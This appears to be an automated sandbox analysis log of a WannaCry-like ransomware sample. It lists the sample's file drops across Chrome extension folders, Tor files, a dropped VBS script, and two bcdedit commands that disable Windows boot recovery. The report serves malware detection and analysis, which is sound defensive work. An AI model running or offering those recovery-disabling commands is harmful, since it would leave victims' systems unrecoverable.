Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\eu\~SD9765.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\fa\~SD9766.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\fi\~SD9776.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\fil\~SD9777.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\fr\~SD9788.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\fr_CA\~SD9789.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\gl\~SD979A.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\gu\~SD979B.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\hi\~SD97AB.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\hr\~SD97AC.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\hu\~SD97AD.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\hy\~SD97AE.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\id\~SD97AF.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\is\~SD97C0.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\it\~SD97C1.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\iw\~SD97C2.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ja\~SD97C3.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ka\~SD97D4.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\km\~SD97D5.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\kn\~SD97D6.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ko\~SD97D7.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\lo\~SD97E7.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\lt\~SD97E8.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\lv\~SD97E9.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ml\~SD97EA.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\mn\~SD97FB.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\mr\~SD97FC.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ms\~SD97FD.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ne\~SD97FE.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\nl\~SD980E.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\no\~SD980F.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\pl\~SD9810.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\pt_BR\~SD9811.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\pt_PT\~SD9812.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ro\~SD9842.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ru\~SD9843.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\si\~SD9844.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\sk\~SD9845.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\sl\~SD9856.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\sr\~SD9857.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\sv\~SD9858.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\sw\~SD9859.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ta\~SD985A.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\te\~SD985B.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\th\~SD986C.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\tr\~SD986D.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\uk\~SD986E.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ur\~SD986F.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\vi\~SD987F.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\zh_CN\~SD9880.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\zh_HK\~SD9881.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\zh_TW\~SD9882.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\zu\~SD9893.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_metadata\~SD9894.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\~SD9895.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\~SD9896.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\css\~SD9897.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\html\~SD98A7.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\images\~SD98A8.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\~SD98A9.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\bg\~SD98AA.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\ca\~SD98BB.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\cs\~SD98BC.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\da\~SD98BD.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\de\~SD98BE.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\el\~SD98BF.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\en\~SD98D0.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\en_GB\~SD98D1.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\es\~SD98D2.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\es_419\~SD98D3.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\et\~SD98D4.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\fi\~SD98D5.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\fil\~SD98D6.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\fr\~SD98E6.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\hi\~SD98E7.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\hr\~SD98E8.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\hu\~SD98E9.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\id\~SD98EA.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\it\~SD98EB.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\ja\~SD98FC.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\ko\~SD98FD.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\lt\~SD98FE.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\lv\~SD98FF.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\nb\~SD9900.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\nl\~SD9901.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\pl\~SD9902.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\pt_BR\~SD9913.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\pt_PT\~SD9914.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\ro\~SD9915.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\ru\~SD9916.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\sk\~SD9917.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\sl\~SD9918.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\sr\~SD9919.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\sv\~SD9929.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\th\~SD992A.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\tr\~SD992B.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\uk\~SD992C.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\vi\~SD992D.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\zh_CN\~SD992E.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\zh_TW\~SD992F.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_metadata\~SD9940.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\~SD9941.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\~SD9942.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\~SD9943.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\ar\~SD9944.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\bg\~SD9945.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\ca\~SD9955.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\cs\~SD9956.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\da\~SD9957.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\de\~SD9958.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\el\~SD9959.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\en\~SD995A.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\es\~SD995B.tmp
May use bcdedit to modify the Windows boot settingsShow sources
Source: tasksche.exeBinary or memory string: 4bcdedit.exe_
Command shell drops VBS filesShow sources
Source: C:\Windows\System32\cmd.exeFile created: C:\ProgramData\ywepvofkuzu108\m.vbs
Creates files in the system32 config directoryShow sources
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exeFile created: C:\Windows\System32\config\systemprofile\AppData\Roaming\tor
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exeFile created: C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\lock
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exeFile created: C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\state.tmp
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exeFile created: C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\unverified-microdesc-consensus.tmp
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exeFile created: C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs.tmp
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exeFile created: C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus.tmp
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exeFile created: C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdescs.new
Drops executables to the windows directory (C:\Windows) and starts themShow sources
Source: C:\mssecsvc.exeExecutable created and started: C:\WINDOWS\tasksche.exe
Drops files with a non-matching file extension (content does not match file extension)Show sources
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\ProgramData\ywepvofkuzu108\u.wnry
Uses bcdedit to modify the Windows boot settingsShow sources
Source: unknownProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
Source: unknownProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
